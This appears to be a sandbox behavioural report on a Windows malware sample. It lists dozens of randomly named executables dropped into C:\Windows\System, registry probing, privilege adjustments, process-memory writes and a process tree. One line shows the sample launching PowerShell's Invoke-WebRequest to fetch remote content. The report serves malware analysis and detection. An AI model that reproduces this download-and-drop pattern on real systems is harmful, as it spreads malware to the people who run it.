File created	C:\Windows\System\jXalLRg.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\mGDBfOC.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\RGlsIqa.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\OjtpLtX.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\BSsOEXw.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\QNGkpuv.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\rnHZMSS.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\WccKKBT.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\RasBmFw.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\tpDQPzG.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\SrJWzkH.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\dRdpjNA.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\NPLLhWq.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\ctoLKwR.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\EKcJLhu.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\RtpdHlh.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\qcPChSc.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\wWnrNcm.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\FrxJQTZ.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\DqmZmHs.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\tJThhrr.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\dHZayec.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\JmDZeJJ.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\arwzPpM.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\jFDGMtD.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\AZXaJQk.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\CXxFTsW.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\XJWtCHm.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\hTgDuIB.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\ronFIGj.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\eRJDMjM.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\RuncqeG.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\FuwQPOW.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\YfRjtPX.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\jdKnVCt.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\LWAAfJP.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
File created	C:\Windows\System\DemtlYp.exe	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
Token: SeLockMemoryPrivilege	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
Token: SeDebugPrivilege	5092	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4732 wrote to memory of 5092	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	89
PID 4732 wrote to memory of 5092	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	89
PID 4732 wrote to memory of 4916	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	90
PID 4732 wrote to memory of 4916	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	90
PID 4732 wrote to memory of 1276	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	91
PID 4732 wrote to memory of 1276	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	91
PID 4732 wrote to memory of 3128	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	92
PID 4732 wrote to memory of 3128	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	92
PID 4732 wrote to memory of 4108	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	93
PID 4732 wrote to memory of 4108	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	93
PID 4732 wrote to memory of 2064	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	94
PID 4732 wrote to memory of 2064	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	94
PID 4732 wrote to memory of 3228	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	95
PID 4732 wrote to memory of 3228	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	95
PID 4732 wrote to memory of 4688	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	96
PID 4732 wrote to memory of 4688	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	96
PID 4732 wrote to memory of 5056	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	97
PID 4732 wrote to memory of 5056	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	97
PID 4732 wrote to memory of 2688	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	98
PID 4732 wrote to memory of 2688	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	98
PID 4732 wrote to memory of 1072	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	99
PID 4732 wrote to memory of 1072	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	99
PID 4732 wrote to memory of 1204	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	100
PID 4732 wrote to memory of 1204	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	100
PID 4732 wrote to memory of 4080	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	101
PID 4732 wrote to memory of 4080	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	101
PID 4732 wrote to memory of 404	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	102
PID 4732 wrote to memory of 404	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	102
PID 4732 wrote to memory of 3900	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	103
PID 4732 wrote to memory of 3900	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	103
PID 4732 wrote to memory of 2456	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	104
PID 4732 wrote to memory of 2456	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	104
PID 4732 wrote to memory of 2632	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	105
PID 4732 wrote to memory of 2632	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	105
PID 4732 wrote to memory of 4120	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	106
PID 4732 wrote to memory of 4120	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	106
PID 4732 wrote to memory of 4928	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	107
PID 4732 wrote to memory of 4928	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	107
PID 4732 wrote to memory of 5068	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	108
PID 4732 wrote to memory of 5068	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	108
PID 4732 wrote to memory of 4696	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	109
PID 4732 wrote to memory of 4696	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	109
PID 4732 wrote to memory of 3908	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	110
PID 4732 wrote to memory of 3908	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	110
PID 4732 wrote to memory of 2792	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	111
PID 4732 wrote to memory of 2792	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	111
PID 4732 wrote to memory of 372	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	112
PID 4732 wrote to memory of 372	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	112
PID 4732 wrote to memory of 1964	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	113
PID 4732 wrote to memory of 1964	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	113
PID 4732 wrote to memory of 2136	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	114
PID 4732 wrote to memory of 2136	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	114
PID 4732 wrote to memory of 1664	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	115
PID 4732 wrote to memory of 1664	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	115
PID 4732 wrote to memory of 3704	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	116
PID 4732 wrote to memory of 3704	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	116
PID 4732 wrote to memory of 2356	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	117
PID 4732 wrote to memory of 2356	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	117
PID 4732 wrote to memory of 4116	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	118
PID 4732 wrote to memory of 4116	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	118
PID 4732 wrote to memory of 4524	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	119
PID 4732 wrote to memory of 4524	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	119
PID 4732 wrote to memory of 4460	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	120
PID 4732 wrote to memory of 4460	4732	1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe	120

C:\Users\Admin\AppData\Local\Temp\1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe
"C:\Users\Admin\AppData\Local\Temp\1d6b830b4fcd3c47d6cb8aac061f680d223f9dc3d19862eed350b3ef3341ec7d.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5092" "2980" "2924" "2984" "0" "0" "2988" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:10516
- C:\Windows\System\EOHtnCI.exe
  C:\Windows\System\EOHtnCI.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\WcNzBhl.exe
  C:\Windows\System\WcNzBhl.exe
  2⤵
  - Executes dropped EXE
  PID:1276
- C:\Windows\System\MwfdnXv.exe
  C:\Windows\System\MwfdnXv.exe
  2⤵
  - Executes dropped EXE
  PID:3128
- C:\Windows\System\ZAVMxAO.exe
  C:\Windows\System\ZAVMxAO.exe
  2⤵
  - Executes dropped EXE
  PID:4108
- C:\Windows\System\aahzKFI.exe
  C:\Windows\System\aahzKFI.exe
  2⤵
  - Executes dropped EXE
  PID:2064
- C:\Windows\System\otXqFhQ.exe
  C:\Windows\System\otXqFhQ.exe
  2⤵
  - Executes dropped EXE
  PID:3228
- C:\Windows\System\tRSxfec.exe
  C:\Windows\System\tRSxfec.exe
  2⤵
  - Executes dropped EXE
  PID:4688
- C:\Windows\System\QARzNOr.exe
  C:\Windows\System\QARzNOr.exe
  2⤵
  - Executes dropped EXE
  PID:5056
- C:\Windows\System\eOJEoOn.exe
  C:\Windows\System\eOJEoOn.exe
  2⤵
  - Executes dropped EXE
  PID:2688
- C:\Windows\System\OZAMHYR.exe
  C:\Windows\System\OZAMHYR.exe
  2⤵
  - Executes dropped EXE
  PID:1072
- C:\Windows\System\DjExygq.exe
  C:\Windows\System\DjExygq.exe
  2⤵
  - Executes dropped EXE
  PID:1204
- C:\Windows\System\ZlCjPjR.exe
  C:\Windows\System\ZlCjPjR.exe
  2⤵
  - Executes dropped EXE
  PID:4080
- C:\Windows\System\CnkWFID.exe
  C:\Windows\System\CnkWFID.exe
  2⤵
  - Executes dropped EXE
  PID:404
- C:\Windows\System\mDcwUBf.exe
  C:\Windows\System\mDcwUBf.exe
  2⤵
  - Executes dropped EXE
  PID:3900
- C:\Windows\System\jVlmRNE.exe
  C:\Windows\System\jVlmRNE.exe
  2⤵
  - Executes dropped EXE
  PID:2456
- C:\Windows\System\IAHnWpu.exe
  C:\Windows\System\IAHnWpu.exe
  2⤵
  - Executes dropped EXE
  PID:2632
- C:\Windows\System\QrkUvxe.exe
  C:\Windows\System\QrkUvxe.exe
  2⤵
  - Executes dropped EXE
  PID:4120
- C:\Windows\System\gANjdae.exe
  C:\Windows\System\gANjdae.exe
  2⤵
  - Executes dropped EXE
  PID:4928
- C:\Windows\System\AtXxvTX.exe
  C:\Windows\System\AtXxvTX.exe
  2⤵
  - Executes dropped EXE
  PID:5068
- C:\Windows\System\ALCeALP.exe
  C:\Windows\System\ALCeALP.exe
  2⤵
  - Executes dropped EXE
  PID:4696
- C:\Windows\System\EjofqRI.exe
  C:\Windows\System\EjofqRI.exe
  2⤵
  - Executes dropped EXE
  PID:3908
- C:\Windows\System\FqIUriK.exe
  C:\Windows\System\FqIUriK.exe
  2⤵
  - Executes dropped EXE
  PID:2792
- C:\Windows\System\EWGGgcD.exe
  C:\Windows\System\EWGGgcD.exe
  2⤵
  - Executes dropped EXE
  PID:372
- C:\Windows\System\bRDIdWW.exe
  C:\Windows\System\bRDIdWW.exe
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\Windows\System\aBXVZZu.exe
  C:\Windows\System\aBXVZZu.exe
  2⤵
  - Executes dropped EXE
  PID:2136
- C:\Windows\System\uGxADvQ.exe
  C:\Windows\System\uGxADvQ.exe
  2⤵
  - Executes dropped EXE
  PID:1664
- C:\Windows\System\DckOVQG.exe
  C:\Windows\System\DckOVQG.exe
  2⤵
  - Executes dropped EXE
  PID:3704
- C:\Windows\System\tkDHCBf.exe
  C:\Windows\System\tkDHCBf.exe
  2⤵
  - Executes dropped EXE
  PID:2356
- C:\Windows\System\lyNCpLn.exe
  C:\Windows\System\lyNCpLn.exe
  2⤵
  - Executes dropped EXE
  PID:4116
- C:\Windows\System\pCWWpmG.exe
  C:\Windows\System\pCWWpmG.exe
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Windows\System\Qqhyckr.exe
  C:\Windows\System\Qqhyckr.exe
  2⤵
  - Executes dropped EXE
  PID:4460
- C:\Windows\System\zFVtCBZ.exe
  C:\Windows\System\zFVtCBZ.exe
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Windows\System\DMokmwk.exe
  C:\Windows\System\DMokmwk.exe
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Windows\System\eFtSDJq.exe
  C:\Windows\System\eFtSDJq.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\TldijFu.exe
  C:\Windows\System\TldijFu.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\Windows\System\GgjgyQU.exe
  C:\Windows\System\GgjgyQU.exe
  2⤵
  - Executes dropped EXE
  PID:504
- C:\Windows\System\CmHpQmO.exe
  C:\Windows\System\CmHpQmO.exe
  2⤵
  - Executes dropped EXE
  PID:4800
- C:\Windows\System\KxAsYmV.exe
  C:\Windows\System\KxAsYmV.exe
  2⤵
  - Executes dropped EXE
  PID:4368
- C:\Windows\System\zHLGkHd.exe
  C:\Windows\System\zHLGkHd.exe
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Windows\System\cumntML.exe
  C:\Windows\System\cumntML.exe
  2⤵
  - Executes dropped EXE
  PID:3752
- C:\Windows\System\ViKzdKv.exe
  C:\Windows\System\ViKzdKv.exe
  2⤵
  - Executes dropped EXE
  PID:3868
- C:\Windows\System\RsbnzXz.exe
  C:\Windows\System\RsbnzXz.exe
  2⤵
  - Executes dropped EXE
  PID:2976
- C:\Windows\System\RrdKoOA.exe
  C:\Windows\System\RrdKoOA.exe
  2⤵
  - Executes dropped EXE
  PID:2708
- C:\Windows\System\sRALqWS.exe
  C:\Windows\System\sRALqWS.exe
  2⤵
  - Executes dropped EXE
  PID:5088
- C:\Windows\System\oabFEuH.exe
  C:\Windows\System\oabFEuH.exe
  2⤵
  - Executes dropped EXE
  PID:2820
- C:\Windows\System\EmmsZxP.exe
  C:\Windows\System\EmmsZxP.exe
  2⤵
  - Executes dropped EXE
  PID:3484
- C:\Windows\System\ErZfrRL.exe
  C:\Windows\System\ErZfrRL.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Windows\System\XevEhQf.exe
  C:\Windows\System\XevEhQf.exe
  2⤵
  - Executes dropped EXE
  PID:4232
- C:\Windows\System\UZBqqyn.exe
  C:\Windows\System\UZBqqyn.exe
  2⤵
  - Executes dropped EXE
  PID:2132
- C:\Windows\System\Fkuxnfb.exe
  C:\Windows\System\Fkuxnfb.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\VZPBnmG.exe
  C:\Windows\System\VZPBnmG.exe
  2⤵
  - Executes dropped EXE
  PID:4584
- C:\Windows\System\MQGqqaE.exe
  C:\Windows\System\MQGqqaE.exe
  2⤵
  - Executes dropped EXE
  PID:904
- C:\Windows\System\caUVnZd.exe
  C:\Windows\System\caUVnZd.exe
  2⤵
  - Executes dropped EXE
  PID:2804
- C:\Windows\System\paRgnFR.exe
  C:\Windows\System\paRgnFR.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Windows\System\gHXRyyP.exe
  C:\Windows\System\gHXRyyP.exe
  2⤵
  - Executes dropped EXE
  PID:2952
- C:\Windows\System\gttXpge.exe
  C:\Windows\System\gttXpge.exe
  2⤵
  - Executes dropped EXE
  PID:4432
- C:\Windows\System\luQEhPa.exe
  C:\Windows\System\luQEhPa.exe
  2⤵
  - Executes dropped EXE
  PID:2448
- C:\Windows\System\UXQHNTE.exe
  C:\Windows\System\UXQHNTE.exe
  2⤵
  - Executes dropped EXE
  PID:4964
- C:\Windows\System\cLBjmrl.exe
  C:\Windows\System\cLBjmrl.exe
  2⤵
  - Executes dropped EXE
  PID:4016
- C:\Windows\System\QcUWwDw.exe
  C:\Windows\System\QcUWwDw.exe
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Windows\System\SkSkQpZ.exe
  C:\Windows\System\SkSkQpZ.exe
  2⤵
  - Executes dropped EXE
  PID:2908
- C:\Windows\System\ZUdPzrV.exe
  C:\Windows\System\ZUdPzrV.exe
  2⤵
  - Executes dropped EXE
  PID:4852
- C:\Windows\System\ChyIGiY.exe
  C:\Windows\System\ChyIGiY.exe
  2⤵
  - Executes dropped EXE
  PID:4332
- C:\Windows\System\jKnXRCE.exe
  C:\Windows\System\jKnXRCE.exe
  2⤵
  - Executes dropped EXE
  PID:3008
- C:\Windows\System\OazRIoI.exe
  C:\Windows\System\OazRIoI.exe
  2⤵
  PID:4612
- C:\Windows\System\BYhXCUH.exe
  C:\Windows\System\BYhXCUH.exe
  2⤵
  PID:4596
- C:\Windows\System\cbAtnsj.exe
  C:\Windows\System\cbAtnsj.exe
  2⤵
  PID:1368
- C:\Windows\System\QMjxMhK.exe
  C:\Windows\System\QMjxMhK.exe
  2⤵
  PID:5124
- C:\Windows\System\bydxCwq.exe
  C:\Windows\System\bydxCwq.exe
  2⤵
  PID:5148
- C:\Windows\System\QljINMO.exe
  C:\Windows\System\QljINMO.exe
  2⤵
  PID:5184
- C:\Windows\System\ENQBnwa.exe
  C:\Windows\System\ENQBnwa.exe
  2⤵
  PID:5208
- C:\Windows\System\gGyHrio.exe
  C:\Windows\System\gGyHrio.exe
  2⤵
  PID:5240
- C:\Windows\System\SQHqmHM.exe
  C:\Windows\System\SQHqmHM.exe
  2⤵
  PID:5276
- C:\Windows\System\DtYqVpe.exe
  C:\Windows\System\DtYqVpe.exe
  2⤵
  PID:5304
- C:\Windows\System\UXJtWVr.exe
  C:\Windows\System\UXJtWVr.exe
  2⤵
  PID:5332
- C:\Windows\System\GUbhXZy.exe
  C:\Windows\System\GUbhXZy.exe
  2⤵
  PID:5360
- C:\Windows\System\vzXmjiq.exe
  C:\Windows\System\vzXmjiq.exe
  2⤵
  PID:5388
- C:\Windows\System\vzSzFvd.exe
  C:\Windows\System\vzSzFvd.exe
  2⤵
  PID:5416
- C:\Windows\System\LldDIwt.exe
  C:\Windows\System\LldDIwt.exe
  2⤵
  PID:5444
- C:\Windows\System\WapNyOj.exe
  C:\Windows\System\WapNyOj.exe
  2⤵
  PID:5472
- C:\Windows\System\iFyjSBb.exe
  C:\Windows\System\iFyjSBb.exe
  2⤵
  PID:5500
- C:\Windows\System\WfGeQnM.exe
  C:\Windows\System\WfGeQnM.exe
  2⤵
  PID:5536
- C:\Windows\System\BwXqDRJ.exe
  C:\Windows\System\BwXqDRJ.exe
  2⤵
  PID:5564
- C:\Windows\System\qnOREsv.exe
  C:\Windows\System\qnOREsv.exe
  2⤵
  PID:5592
- C:\Windows\System\jgJvWGh.exe
  C:\Windows\System\jgJvWGh.exe
  2⤵
  PID:5616
- C:\Windows\System\KMjdXjO.exe
  C:\Windows\System\KMjdXjO.exe
  2⤵
  PID:5648
- C:\Windows\System\ViwesZI.exe
  C:\Windows\System\ViwesZI.exe
  2⤵
  PID:5672
- C:\Windows\System\imtkZMU.exe
  C:\Windows\System\imtkZMU.exe
  2⤵
  PID:5696
- C:\Windows\System\keewvxJ.exe
  C:\Windows\System\keewvxJ.exe
  2⤵
  PID:5724
- C:\Windows\System\jtvevYF.exe
  C:\Windows\System\jtvevYF.exe
  2⤵
  PID:5752
- C:\Windows\System\kvjTYJU.exe
  C:\Windows\System\kvjTYJU.exe
  2⤵
  PID:5780
- C:\Windows\System\kWcsOzC.exe
  C:\Windows\System\kWcsOzC.exe
  2⤵
  PID:5896
- C:\Windows\System\FhaadEV.exe
  C:\Windows\System\FhaadEV.exe
  2⤵
  PID:5920
- C:\Windows\System\hRAZmbX.exe
  C:\Windows\System\hRAZmbX.exe
  2⤵
  PID:5948
- C:\Windows\System\MEIJniu.exe
  C:\Windows\System\MEIJniu.exe
  2⤵
  PID:5968
- C:\Windows\System\IcsWHot.exe
  C:\Windows\System\IcsWHot.exe
  2⤵
  PID:5984
- C:\Windows\System\FJDgrYJ.exe
  C:\Windows\System\FJDgrYJ.exe
  2⤵
  PID:6008
- C:\Windows\System\SnhaWwP.exe
  C:\Windows\System\SnhaWwP.exe
  2⤵
  PID:6028
- C:\Windows\System\ISrbZZb.exe
  C:\Windows\System\ISrbZZb.exe
  2⤵
  PID:6056
- C:\Windows\System\llqJlQl.exe
  C:\Windows\System\llqJlQl.exe
  2⤵
  PID:6084
- C:\Windows\System\hiHtrbE.exe
  C:\Windows\System\hiHtrbE.exe
  2⤵
  PID:6100
- C:\Windows\System\WWsqBLM.exe
  C:\Windows\System\WWsqBLM.exe
  2⤵
  PID:6120
- C:\Windows\System\orfMXRP.exe
  C:\Windows\System\orfMXRP.exe
  2⤵
  PID:3288
- C:\Windows\System\caEwgPv.exe
  C:\Windows\System\caEwgPv.exe
  2⤵
  PID:5172
- C:\Windows\System\TDXbtLO.exe
  C:\Windows\System\TDXbtLO.exe
  2⤵
  PID:5220
- C:\Windows\System\cEaoUKE.exe
  C:\Windows\System\cEaoUKE.exe
  2⤵
  PID:5256
